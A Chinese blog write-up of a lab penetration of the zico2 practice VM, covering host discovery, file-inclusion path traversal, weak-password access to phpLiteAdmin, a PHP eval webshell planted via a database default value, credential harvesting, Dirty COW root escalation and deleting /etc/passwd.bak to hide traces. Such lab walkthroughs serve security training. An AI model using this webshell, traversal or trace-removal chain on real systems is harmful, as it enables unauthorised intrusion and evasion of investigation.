zico2靶机打靶记录
一、漏洞平台搭建
我们下载得到的是一个ova后缀的文件,OVA 文件是一种打包格式,它将虚拟机的相关文件(如虚拟磁盘映像、虚拟机配置信息、操作系统镜像等)打包成一个单独的文件,以便于传输、分享和部署虚拟机。
我这里可以直接导入这个靶场
通过打开我们下载的ova文件导入靶场
我们这里设置导入虚拟机的名称和存放位置
然后点击导入就可以导入这个靶机了
然后我们开启靶机就行了
这里就启动成功了
二、主机发现
首先我们要先获取到目标靶机的ip地址
由于目标靶机和kali在同一网段,我们这里直接用kali扫描网段存活主机
命令:
1 | arp-scan -l |
通过对网段存活主机的扫描可以得到我们目标靶机的ip地址
二、信息收集
上面我们通过arp协议扫描到了目标靶机的ip地址
但是为了能够进一步渗透我们需要对目标靶机进行信息收集
nmap扫描目标靶机开放的端口
命令:
1 | nmap -A -T4 -O -p 0-65535 192.168.113.133 |
目标靶机开放了22端口和80端口
说明目标靶机开放了web服务
访问响应的web服务
三、漏洞扫描与利用
访问网站可以看到这是一个类似于商店类型的网站
首先就是对网站的各个功能点,页面进行测试,看看能不能找到利用的点
在对网站功能进行查看的时候可以看到在 Service存在一个跳转按钮
点击后跳转到了一个商品页面
我们可以看到这个所传递的参数和路由
http://192.168.113.133/view.php?page=tools.html
这里猜测后台处理逻辑是通过page参数将我们要访问的页面传递给view.php进行处理后将相应的页面传递给前端。
我们这里把参数值改为index.html
可以看到成功返回了首页面
但是只能返回设定路径下的文件
比如我们这里尝试返回根目录下的/etc/passwd
回显是空,说明这个只能返回对应目录下的文件,但是如果网站过滤不严格的话,我们完全可以通过../向上一级跳跃
读取成功,说明这里存在文件包含漏洞
但是这个漏洞也只是可以让我们对服务器的一下文件进行读取和查看,并不能帮助我们直接拿下这台服务器
其他的功能点并没有找到明显可以利用的漏洞
通过dirsearch工具对网站目录进行扫描
命令:
1 | dirsearch -u http://192.168.113.133 |
很明显这里存在一个dbadmin路由
访问可以发现存在两个页面一个是首页,另外一个是执行数据库操作的文件
访问test_db.php
尝试弱口令登录
admin可以登录成功
这是一个对数据库进行操作的页面
在数据库中我们可以得到两组账号密码
密码是被md5加密的,进行md5解密
可以得到两组账号密码:
1 | root:34kroot34 |
尝试ssh登录
登录失败
这是一个管理 SQLite 数据库的开源 web 应用程序phpLiteAdmin 而且我们还给出了版本号
通过漏洞工具searchsploit去查询对应版本所存在的漏洞
存在远程代码注入漏洞
那我们可以通过这个漏洞写入后门文件。然后通过文件包含漏洞访问这个后门文件进行shell利用
创建的数据库文件是存在于/user/databases下的
并且对文件后缀并没有限制
那我们就可以创建一个php后门文件
然后在文件中写入一句话木马
创建一个shell.php文件
设置表名和表的数量
在default value值出写入我们的一句话木马
1 | <?php @eval($_POST[a]);?> |
点击创建我们的木马文件就成功写入了
但是因为我们写入的后门文件是在/usr/databases下
不能直接访问
所以我们这里通过前面的文件包含漏洞包含到这个后门文件
蚁剑连接
成功进入到服务器
然后在服务器文件中
查找靶机中有没有存在敏感信息。最终在家目录中wordpress中的配置文件wp-config.php
中找到了zico
账号和密码 sWfCsfJSPV9H3AmQzw8
尝试ssh登录
登录成功
但是可以看到这个账号只是普通用户权限
我们要拿下这太服务器就要把权限提升到root权限
四、脏牛提权
查看一下内核版本
内核版本是3.2.0,那我们这里可以内核漏洞进行脏牛提权,脏牛漏洞影响版本低于3.9的liunx内核
利用exp:
1 | // |
保存成一个shell.c文件
上传到我们的服务器
用gcc编译一下
命令:
1 | gcc -pthread c代码文件名 -o 输出文件名 -lcrypt |
执行编译后的程序
输入密码
我们这里看一下etc/passwd
可以看到我们这里成功添加了一个firefart用户而且还是root权限
我们这里其实就是利用脏牛漏洞在etc/passwd中添加了一个root用户
但是攻击者在利用脏牛漏洞时通常会创建一个备份文件,如 /etc/passwd.bak
,用于保存原始的 /etc/passwd
文件内容
我们这里为了删除攻击痕迹,可以把这个文件删除掉
上面我们通过脏牛漏洞成功添加了一个特权用户,并且有root权限
那么我们可以通过su切换到这个特权用户
密码是我们上面自己设的。
提权到root权限,那么到这里我们就拿下了这台服务器。
- 标题: zico2靶机打靶记录
- 作者: GTL-JU
- 创建于: 2023-09-08 11:35:01
- 更新于: 2023-09-12 20:16:06
- 链接: https://gtl-ju.github.io/2023/09/08/zico2靶机打靶记录/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。